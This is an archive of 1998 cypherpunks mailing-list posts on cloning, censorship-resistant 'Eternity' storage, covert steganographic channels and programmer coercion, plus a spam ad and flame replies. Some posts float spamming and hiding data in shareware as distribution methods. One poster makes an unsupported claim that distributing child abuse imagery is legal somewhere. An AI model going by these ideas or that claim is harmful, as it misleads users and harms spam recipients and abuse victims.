rdl@mit.edu
http://mit.edu/rdl/		






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 14 Jan 1998 22:48:06 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Talk of Banning Research into Human Cloning (fwd)
Message-ID: <199801141503.JAA00917@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 14 Jan 1998 12:31:04 +0000 (GMT)
> From: "David E. Smith" <dave@bureau42.ml.org>
> Subject: Re: Talk of Banning Research into Human Cloning (fwd)

> > I wonder if it is the intention of those who support a ban on human cloning
> > to prevent my friend who lost his forearm in the Vietnam War from having a
> > new one grown and attached?
> 
> Yup. Unless there's some remarkable breakthrough, you can't just grow an
> eyeball, or a kidney, or whatever. You've gotta grow the whole body. In
> time, we might be able to genegineer the process for optimal production of
> the targeted body part, likely with all sorts of side effects that would
> be, er, detrimental in a "real" person.

Actualy, at least according to one episode of that show on TDC that Skully
form the X-Files hosts, there are several groups who are working on just
this thing. One female researcher has extended the life of worms (admittedly
a step or two from humans) by 7 times with no apparent effect. There was a
piece on CNN late last nite about some researchers discussing this as well.
Their estimate is that it would be at least 5 years before there would be
anything available on the open market.

There is also at least two groups working on growing specific organs. One
group (the one interviewed on the TDC show) is using plastic forms to grow
the organs in. They can apparently grow small samples of specific cells and
are looking at how to organize the growth of more complex structures such as
a kidney which would include blood-vessels and such.

I am sorry I don't know the name of the show. If somebody out there does
please speak up.

My prediction is that within 15 years there will be methods to extend human
life by at least a factor of 3 and techniques to replace every organ or
structure with the persons own cells (thus alleviating all tissue rejection
problems) through accellerated growth mechanism based on cloning in such a
way that cancer, accidents, etc. will become at best temporary tragedies.

In short, unless you get your head or entire torso squished there will be
methods to keep people alive for periods approaching 200 years. Further,
these techniques will be available through standard insurance via your
employer because they will be low cost (that's the nice thing about
bio-science).



    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 14 Jan 1998 23:08:01 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: how to release code if the programmer is a target for coercion (fwd)
Message-ID: <199801141532.JAA01028@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: how to release code if the programmer is a target for coercion
> Date: Wed, 14 Jan 1998 08:41:16 EST
> From: Ryan Lackey <rdl@mit.edu>

> Tim May brought this issue up recently -- if someone develops a greatest-
> thing-since-sliced-bread Eternity package, then releases it. it's pretty
> likely that they will eventually be approached by (mi6/mossad/CIA/KCIA/etc.).
> 
> What's likely to happen?
> 
> Certainly they could kill you.  They could make it look like random street
> crime, or an accident, or kill you with #16 000 in your pocket just to make
> it clear what their reasons were (Gerald Bull, Mossad, London, .32acp).  

Actualy they killed Bull before he could complete his Super-Gun design and
get it built. There is no point to be had in killing the designer after the
fact except to advertise their accomplishment except to prevent future work
by that person.

> More likely, they'd try to coerce you.  This could include threats of death,
> which are best responded to by ignoring them, since they don't gain anything
> if they kill you.  Or torture, which is equally ineffective if they kill you.
> Or slander/etc. to try to discredit you. (unlikely to work at least among
> cypherpunks, in the absence of technical attacks as well).

This seems to have worked with several of the programmers at The L0pht
(l0pht.com) because of their legal problems. Seems they now do work for the
DoJ and other groups in return the various charges that were pending against
them were dropped (or at least put on hold).

> Most likely, they would try to buy you.  This could be by outright offering
> money for back doors, which would be great if it worked, but is unlikely to
> happen in the first place.

L0phtCrack is one of the major NT cracking/testing tools currently used by
folks. And no, I am not implying it has been compromised only pointing out
that because of the relationship of some of the programmers to law
enforcement it could have been. I am not aware of the exact timing of the
agreement, development, and release of the software.

>  If offered a bribe, you could go public with
> that fact (preferably after taking the money :),

Then everyone would want proof and if you couldn't produce it they would
simply label you a nutcase. You probably would have mysterious accident
after that sort of behaviour. Besides, even if you were to prove it - could
you trust the witness protection process?

> I was looking around for a solution to this -- Lenny Foner at the MIT
> Media lab has something for his agents project which might be a solution.
> A system by which sections of source code are verified by individuals,
> signed, other sections are verified by others, etc.  Then, during

If the agents could infiltrate the development team what keeps them from
mounting a mitm attack on the people doing the signing?


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Mynott <steve@tightrope.demon.co.uk>
Date: Wed, 14 Jan 1998 17:59:01 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: 1st sign of a closed mind...
In-Reply-To: <199801131723.LAA27648@einstein.ssz.com>
Message-ID: <19980114095040.44123@tightrope.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, Jan 13, 1998 at 11:23:07AM -0600, Jim Choate wrote:
> "I won't listen to that because ...."
 
The signature file is too long and contains lame ascii? :)

-- 
Steve 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 14 Jan 1998 23:37:09 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: (eternity) Covert Superhighway - the missing component? (fwd)
Message-ID: <199801141553.JAA01099@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 14 Jan 1998 12:41:53 GMT
> From: Adam Back <aba@dcs.ex.ac.uk>
> Subject: Re: (eternity) Covert Superhighway - the missing component?

> - post to random newsgroups, use textual mimic functions, send
>   decryption keys after the stegoed data has been distributed to
>   disguise data until it is too late to affect distribution

Isn't this going to increase latency and increase the likelihood of both
sureptitious attacks (I notice the request in newsgroup A and begin putting
my mitm requests in the other newsgroups - the odds being that I will get
the data and then forward to the original recipient with small changes) as
well as must plain missing the request?

> - become a spammer, or employ some spammers.  Spammers use the hit and
>   run approach with disposable accounts; with sufficient availability
>   of accounts, and the economic incentive they seem to flourish in
>   spite of intense displeasure of recipients.

Be shure to pay with cash and use an anonymous name and address. Considering
the cost of accounts this could be quite expensive. Many services do provide
the first 2 weeks free or similar features. I predict that should this model
be put into practice at a very broad level the ISP's won't give the free
trial-periods to anonymous accounts.

> - video signals: live porn shows, one on one "chat live to our model,
>   she will do anything you ask, blah, blah" -- high volume, easy
>   target for stego, plausible reasons for anonymity

Is this going to be a live model or a VR relicant? If it is a live model
then it should be relatively trivial to determine that persons
identification and location. Another question that comes up is how many
strippers are going to participate in this if they know the consequences?
It's one thing to spend the night or a few weeks in the tank, a whole nother
thing to spend years in there.

> - subliminal channels in the TCP/IP and IPSEC protocols.  Someone
>   posted a reference for an implementation of some subliminal channels
>   in the linux TCP/IP stack.

These still have to show up in the actual packets and are open to sniffer
attacks. Also, the individual packets can be traced from router to router.
Lot's of blind alleys but you'll get there eventualy.

> When people can buy a T1 to their house for 2,000/yr instead of
> 20,000, we will stand a better chance.

SWBT will currently sell T1 access to homes for as little as $214/mo. Would
you settle for $2,568/yr.? Note that this price doesn't include routing and
name resolution. I'm still (3 months later) trying to get SWBT to tell me
how much they will charge for this - they supposedly offer it but I have yet
to find an actual business office that support home delivery of service.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ross Anderson <Ross.Anderson@cl.cam.ac.uk>
Date: Wed, 14 Jan 1998 18:06:02 +0800
To: eternity@internexus.net
Subject: Covert Superhighway - the missing component?
Message-ID: <E0xsPbf-0002vu-00@heaton.cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Scratch Monkey proposes building an Eternity service using the Stego
File System, provided an anonymous broadcast channel exists - it's
assumed that alt.anonymous.messages will do the job.

I suspect that wide deployment of Eternity would lead to this group
being closed down. We need a more robust anonymous broadcast
channel. Let's call it the `Covert Superhighway'. How do we build it?

Ross






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 14 Jan 1998 23:51:30 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Cellular fountain of youth found [CNN]
Message-ID: <199801141611.KAA01182@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>                SCIENTISTS DISCOVER CELLULAR 'FOUNTAIN OF YOUTH'
>                                        
>      Cell/slide Adding the telomerase enzyme keeps cells alive and
>      dividing   In this story:
>      * Enzyme helps cells avoid aging, death
>      * Stock in biotech company skyrockets
>      * Telomeres grow back
>      * 'It will totally transform genetic engineering'
>      * Related stories and sites
>        
>      January 13, 1998
>      Web posted at: 8:55 p.m. EST (0155 GMT)
>      
>      WASHINGTON (CNN) -- Researchers at the University of Texas
>      Southwestern Medical Center say they have discovered a cellular
>      "fountain of youth" that enables human cells to avoid normal aging
>      and cell death.
>      
>      The finding won't make people any younger or allow them to live
>      forever, but the researchers say it could keep them healthier
>      longer.

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@beast.brainlink.com>
Date: Wed, 14 Jan 1998 23:58:45 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Eternity Services
In-Reply-To: <v03102801b0df03d95cd4@[207.167.93.63]>
Message-ID: <Pine.SUN.3.96.980114103134.521D-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 11 Jan 1998, Tim May wrote:

> The CD-ROM distribution is just a side aspect, to get some set of data
> widely dispersed. For example, if the data base is of "abortion" or
> "euthanasia" information (a la Hemlock Society), which various parties want
> suppressed, then handing out freebie CD-ROMs is one step.
> 
> Many examples of this: Samizdats in Russia, crypto/PGP diskettes handed out
> at conferences (was Ray Arachelian doing this several years ago?), and
> various religious and social tracts. Obviously, this is what broadsheets
> and fliers are designed to do. Self-publishing in general.

Yep.  I gave them out at trade shows such as PC Expo.  What I found best
was to dump a stack of them on a common table area.  These expos usually
do have public machines for users to login and check email (horrible idea 
in  terms of security!), or surf.  CD's would be better suited for this
of course.

Another idea is to include hidden archives or pieces of archives in the
stuff we distribute.  Have you signature be a piece of a big archives and
post different pieces daily.  If you write shareware, etc. include
inactive files with the distribution, perhaps stegoing pieces in any
images (setup screens, logos, etc...)

> If the intent is to collect money for the data base accesses, then of
> course other considerations come into play.

You could always give the media away then charge a fee for unlocking it.
Many companies already do this.  (see www.warehouse.com and go to download
warehouse from there.)  You can download a package which is unlocked only
when you give them a credit card number.  The unlocking key is RSA
based...

There are also spam based free web sites out there where anyone can get a
web page if they agree to have the provider provide a spam bar ad.  You
could easily get dozens of these on various providers and hide bits of the
info there.

> (* I say "working" in the sense that the concept was very easy to
> demonstrate just by using PGP and remailers. Not much more than what I
> demonstrated in 1993 would be needed to deploy a real system. Except for
> one thing: true digital cash. Not the bullshit one-way-traceable stuff that
> Chaum and others are now pushing, but the original, online-cleared or
> escrow-cleared form, a la the work of Goldberg et. al. For some of these
> applications, below, simple token- or coupon-based schemes might work
> adequately.)

For that to happen, alternate banks must exist first, or at least
alternate ecconomies with some way to translate inbetween.  I doubt many
governments will allow this.  Heck, our city government is taking to
ticketing jaywalkers now, if they're getting this vicious on the city
level, think at the Fed level they'll let this happen?

Perhaps something like a swiss bank might be able/willing to do the
exchange.
 
> Yep, it's hard to disagree with this. Any centralized "Eternity service"
> will be hit with various kinds of attacks in quick order.

The biggest problem to this will be the 'let kiddies posting whole CDROMS
of pirated stuff to the sites, this will certainly eat up all the space on
the servers and make them more liable to raids.
 
Heck, if the kiddies don't take to this, the spooks will pretend to be
kiddies and do the same.

The biggest problem though will be replicating the haven throughout the
world so that the whole haven will be at a point where it can't be easily
shut down, even if one or two go down.

How many servers do we have so far?


=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Sparkes <isparkes@q9f47.dmst02.telekom.de>
Date: Wed, 14 Jan 1998 18:11:49 +0800
To: cypherpunks@toad.com
Subject: Re: TLS implementations
In-Reply-To: <a5885eb6176a753c1dad1eba54afc7d9@anon.efga.org>
Message-ID: <3.0.2.32.19980114105954.006bf470@q9f47.dmst02.telekom.de>
MIME-Version: 1.0
Content-Type: text/plain



At 00:31 14.01.98 -0500, Anonymous wrote:
>Don't you know the place where there is anyone
>TLS implementations (source code)?
>Teach to me if it is here because it is known.
>Thank you very much.
>

What is this thing which before me I see?
Lo! 'Tis a herald from Nobochookie-san!
Is it? Or is it just someone posing as he?
For he speaks in riddles to cover his plan...

(Things are a bit slow here today - you might have guessed)

    --
            \!!/
          ( o  o )  
+------ooO--(_)--Ooo-+----------------------------------------------------+
|  .oooO             | PGP5 Key Fingerprint:                              |  
| (    )    Oooo.    | 1F59 CADC 951E ADAD 5EA5  9544 FCCE 8E30 4988 551E |
|  \   (    (    )   | Crypto Kong signature below                        |
|    \__)    )  /    |                                                    |
|           (__/     |"Ian.Sparkes(at)T-Online.de" "Ian.Sparkes(at)ac.com"|
|                    |"isparkes(at)q9f47.dmst02.telekom.de"               |
|                    | Life empiricist and confused ethical hedonist      |
|                    |                                                    |
+--------------------+----------------------------------------------------+
| I'm not your lawer, you're not my client. This is therefore not advice  |
+-------------------------------------------------------------------------+

    --digsig
         Ian Sparkes
     2u5Nfae28E97i3Q6GXCKjyVMc01IoVPE20AcNwVhVHv
     1mCAElQ4Pnn2mXI1zRafFJRqWDlUWFOf2Km4nT8O
     4ddYACfzVy8hIx+JU/Nde/oQmwHEF6zEeBY6LshYI





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ? the Platypus {aka David Formosa} <dformosa@st.nepean.uws.edu.au>
Date: Wed, 14 Jan 1998 10:05:13 +0800
To: Tim May <tcmay@got.net>
Subject: Re: (eternity) Re: mirroring services, web accounts for ecash
In-Reply-To: <v03102805b0e09252f52e@[207.167.93.63]>
Message-ID: <Pine.LNX.3.93.980114112449.148D-100000@shirley>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 12 Jan 1998, Tim May wrote:

[...]

> And I think implementing the slower-but-no-breakthroughs approach (Blacknet
> or variations) has some advantages. It may be many years before we need to
> be in the corner of the graph that is "large amounts of data--very fast
> retrieval--very secure."
> 
> Most candidates for untraceable/secure storage and retrieval are NOT in
> this corner, yet. (Kiddie porn may be, but whistleblowing and scientific
> information are not.)

You know, I think we have been missing one use for eternerty services.
Its a cheap reliable off site backup system.  You simply encrypt your
data, and throw it into the system.

In addtion a large number of comperise useing the system like this will
become a type of hostage against interference.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBNLwHFKQK0ynCmdStAQE9MQP/WZitSpCzVnx/rYX9qvkf80ZapgE1bws4
MjSmkI5tVpEg5uJ2Rqq5lb6xBzMPUtJ9jgBsUyAcYOH07k8Ycg5NW3UYrnQVNiz4
/h7qENmAjmErONhIZBN+NYd69q/v7q+d3WyQTJif74k5T0cwrfHagnzbWcusNYYt
4iA/pO1SCHU=
=oTNd
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ? the Platypus {aka David Formosa} <dformosa@st.nepean.uws.edu.au>
Date: Wed, 14 Jan 1998 10:22:32 +0800
To: Ryan Lackey <rdl@mit.edu>
Subject: Re: (eternity) autonomous agents
In-Reply-To: <199801131244.HAA22857@the-great-machine.mit.edu>
Message-ID: <Pine.LNX.3.93.980114113810.148F-100000@shirley>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 13 Jan 1998, Ryan Lackey wrote:

> I believe the web or the internet as a whole
> are now large and important enough to Joe Sixpack that shutting them off
> to stop illegal activity is infeasible -- I do not agree that USENET
> is.  I think 2 weeks of press in the US about "USENET, the network used
> by kiddie porn photographers to trade photos, must be shut down" would be
> enough to shut usenet in the US down.

I beleave that this is quite unlikely.  Usenet is infact bigger then the
internet as a whole.  Shutting down usenet would be a difficalt task,  how
are you going to convinvince all thouse peaple who like usenet to give it
up.  In fact how are you going to convinve copernise like zippo and
altoba who are dedcated to providing usenet connectiverty to give up there
primery money sorce.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBNLwLyqQK0ynCmdStAQFOuwP+LpitV9bYaMMSvcMN7PkLX+UfpsPnoCwH
mNGueb3UV2Nf4h692SFcwy+bYrLhQRU0pZMuk3INNpUuVQ2CERBa29aSNfas9OiD
e7u8LHziHH6c9wuwLpTf4ZbZ3cxvhkXHnWSaM/IPJ+pdlvJBd5koiFHyqmxLsLwF
uok0uXOGkaQ=
=C5IV
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ? the Platypus {aka David Formosa} <dformosa@st.nepean.uws.edu.au>
Date: Wed, 14 Jan 1998 10:32:51 +0800
To: Thomas Womack <thomas.womack@merton.oxford.ac.uk>
Subject: Re: (eternity) autonomous agents
In-Reply-To: <01bd2037$68046310$409001a3@mc64.merton.ox.ac.uk>
Message-ID: <Pine.LNX.3.93.980114115633.148G-100000@shirley>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 13 Jan 1998, Thomas Womack wrote:

> I suspect you will still run into things which are illegal anywhere;

For eggample?  Rembour, alot illegality is about cultural hangups and
tabbos.  Which change when thay are in diffrent contexts.

[...]

>I don't think (eg) the more extreme sort
> of kiddyporn is legal *anywhere*.

I beleave that there are places where the distrabution of child porn
is legal even if its production isn't.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBNLwOBaQK0ynCmdStAQFbCQQAhi+blZZvPbAPjvUSLaQdH9bmyPnfwEn1
ePTcGdHR80qv9j7P9o+WfsvaSWYnKY9pW2HttHbfa5aq09VCS245Q3wwD5e4zGU2
rrqNLT9bP9pimqKsyjcjVS8PoFwXCJPdspjgCDL3zDBhoRwhGyvpljt8ufE4yHsC
3ZO5IKwhVcY=
=+4iF
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dave@bureau42.ml.org>
Date: Wed, 14 Jan 1998 20:37:31 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: Talk of Banning Research into Human Cloning (fwd)
In-Reply-To: <v0311073ab0e21842b364@[207.94.249.133]>
Message-ID: <Pine.LNX.3.96.980114122910.9299A-100000@bureau42.ml.org>
MIME-Version: 1.0
Content-Type: text/plain



> I wonder if it is the intention of those who support a ban on human cloning
> to prevent my friend who lost his forearm in the Vietnam War from having a
> new one grown and attached?

Yup. Unless there's some remarkable breakthrough, you can't just grow an
eyeball, or a kidney, or whatever. You've gotta grow the whole body. In
time, we might be able to genegineer the process for optimal production of
the targeted body part, likely with all sorts of side effects that would
be, er, detrimental in a "real" person.

Oh, wait, we'll never have the chance to do those studies in the first
place. Hope old "lefty" is happy with just one arm.

dave





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 14 Jan 1998 20:52:16 +0800
To: Ross.Anderson@cl.cam.ac.uk
Subject: Re: (eternity) Covert Superhighway - the missing component?
In-Reply-To: <E0xsPbf-0002vu-00@heaton.cl.cam.ac.uk>
Message-ID: <199801141241.MAA00398@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Ross Anderson <Ross.Anderson@cl.cam.ac.uk>
> Scratch Monkey proposes building an Eternity service using the Stego
> File System, provided an anonymous broadcast channel exists - it's
> assumed that alt.anonymous.messages will do the job.
> 
> I suspect that wide deployment of Eternity would lead to this group
> being closed down. We need a more robust anonymous broadcast
> channel. Let's call it the `Covert Superhighway'. How do we build it?

Some ideas:

- post to random newsgroups, use textual mimic functions, send
  decryption keys after the stegoed data has been distributed to
  disguise data until it is too late to affect distribution

- become a spammer, or employ some spammers.  Spammers use the hit and
  run approach with disposable accounts; with sufficient availability
  of accounts, and the economic incentive they seem to flourish in
  spite of intense displeasure of recipients.

- video signals: live porn shows, one on one "chat live to our model,
  she will do anything you ask, blah, blah" -- high volume, easy
  target for stego, plausible reasons for anonymity

- subliminal channels in the TCP/IP and IPSEC protocols.  Someone
  posted a reference for an implementation of some subliminal channels
  in the linux TCP/IP stack.

- VR gaming, VR chat rooms with audio, video; this could be a higher
  bandwidth version of IRC.  

- Subliminal channels in computer generated random numbers for
  multi-player internet based games.  (Death match doom with
  subliminal channels, or with audio, video, etc)

Not a very super-highway like subliminal network possibly... mostly
the internet is not up to real time VR, video chat, etc. for the
majority of users at present.  Many of the better applications for
subliminal channels are currently impractical.

When people can buy a T1 to their house for 2,000/yr instead of
20,000, we will stand a better chance.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 14 Jan 1998 22:38:45 +0800
To: cypherpunks@ssz.com
Subject: Re: Don't shoot the messenger (Re: 1 Question to Dr. Froomkin...) (fwd)
In-Reply-To: <199801140034.SAA30080@einstein.ssz.com>
Message-ID: <199801141431.PAA03381@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Jim Choate writes:

> If you want to trust your future to somebody who 'shuts down'
> because
> somebody says "spin doctor bullshit" or strenously defends their
> views be
> my guest. Me, I want a MUCH more mature and determined individual
> handling
> me and my decendants future. I want to experience that strength of
> conviction from them not a yellow streak.

A 'yellow streak'?  This is oh-so-mature, Jim.  Especially following
your increasingly desperate 'why won't you speak with me, Dr.
Froomkin' pleas.

Face the facts, Jim:  People are kill-filing you because you've been
an arrogant, overbearing prick.  Learn some manners.

  Frondeur

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNLzMAFqnO6WRZ1UEEQL4IQCgwIabisfy9pc4ndS2MEQHVfnRunYAn3O+
9QZkpV9FmPN8geRZWOeV+lnS
=3AXX
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: webmaster@wildauction.com
Date: Thu, 15 Jan 1998 00:46:27 +0800
To: <cypherpunks@toad.com>
Subject: Apologies
Message-ID: <199801141631.IAA58742@rho.ben2.ucla.edu>
MIME-Version: 1.0
Content-Type: text/plain




Hello, sorry it took so long to respond.  First of all our live online auction site, wildauction.com,  is up and running.  
However, we are currently in our final phase of testing.  It is open for business but we have done no advertising and our 
first email list won't go out until this weekend (After the USA today story about it).   If you can keep hush hush about it 
check it out at http://www.wildauction.com .  Please note, due to our new SSL features some users (In particular AOL and 
IE3.x Users), Will have to use the unsecure registration. As a bonus to our first customers we are offering free shipping.  
You asked about what makes us different from the competition.  That's easy!

No minimum bids!
No Reserve prices!
On a dedicated T3!
Secure registration!
Loaded with computer products!

Again, the password protections have been removed so check it out.  You might even get a pentium 233MMX for 
around 40 bucks. (there aren't that many bidders yet :)

Thanks,
John

http://www.wildauction.com 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Thu, 15 Jan 1998 11:46:31 +0800
To: Crisavec <dbrown@alaska.net>
Subject: Re: cypherpunks and guns
In-Reply-To: <3.0.5.32.19980114135342.008c9d80@alaska.net>
Message-ID: <Pine.BSF.3.91.980114082927.10641K-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain





On Wed, 14 Jan 1998, Crisavec wrote:

> 
> All I'm saying is that not EVERYONE who collects a government paycheck has
> "diminished mental capacity"  I know several people with genius level IQ's
> that simply don't care where they work....And that's something to remember...
> 
> >> >
> >> >The fact that they collect a paycheck from the government is prima facie
> >> >evidence of diminished mental capacity.
> >> 
> >> Don't bet on....
> >> 
> >> 
> >> There is only one war, and it's not between the whites and the
> >> blacks, Labour and the Conservatives, Democrats and Republicans, or
> >> the Federation and the Romulans, it's between those of us who aren't
                                      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^   
> >> complete idiots and those of us who are.
     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 
> >> 
> >> 
> >Who's side are you on?
   ^^^^^^^^^^^^^^^^^^^^^^
> >
> >
> 
> 
>  --Dave
> 

Some days, it just isn't worth the effort anymore. Sigh.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Thu, 15 Jan 1998 09:39:48 +0800
To: Jim Choate <cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re:  [POLITICS] 1 Question to Dr. Froomkin...
In-Reply-To: <199801131845.MAA28160@einstein.ssz.com>
Message-ID: <3.0.5.32.19980114091307.0089e180@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 12:45 PM 1/13/98 -0600, Jim Choate wrote:
>Do you accept that the Constitution of the United States of America is the
>supreme law of the land and therefore the ultimate legal authority within
>its borders?

Jim -
you and I are political theorists, and you're asking a political question,
though I'm not sure what kind of question you mean.
Froomkin's a law professor, though he's also got political opinions.
To a lawyer, the answer is that the Constitution ultimately means
whatever you can talk the Supreme Court into saying it means,
or whatever you or your opponents can talk a lower court into saying 
if the court's opinion is strong enough that the loser decides
it's not worth spending the resources to appeal, and the Supreme Court
has decided all sorts of things over the years depending on
the political climate.   Many legal and political theorists have
opinions about Marbury vs. Madison and the other cases in which the
Supreme Court decided that the Constitution said they're the ones
who get to decide what the Constitution means; you may have opinions
about that, or you could be asking Froomkin what he thinks about it.

On the other hand, the Constitution is a political compromise
between a bunch of long-dead politicians, in which they offered the
public a deal that they'd mostly stick within its limits
if they agreed not to ignore or overthrow them.  So you could be asking
if he thinks it's a good compromise, or you could be asking if
he's a Loyal American who agrees not to overthrow or ignore the
Constitution (as opposed to one of them pinko Commies),
or you could be asking if he's a Loyal American who believes the
Government isn't sticking to their end of the bargain and
therefore deserves to be overthrown.  Or you could be asking a
Lysander Spooner question about whether he thinks a bunch of
promises made by a bunch of long-dead politicians have any
authority over either the politicians or the people today.

So which question are you asking, and why?




				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Thu, 15 Jan 1998 01:57:55 +0800
To: cypherpunks@toad.com
Subject: Re: (eternity) autonomous agents
In-Reply-To: <Pine.BSI.3.95.980113152218.18878E-100000@kizmiaz.dis.org>
Message-ID: <3.0.5.32.19980114092902.007c09c0@206.40.207.40>
MIME-Version: 1.0
Content-Type: text/plain



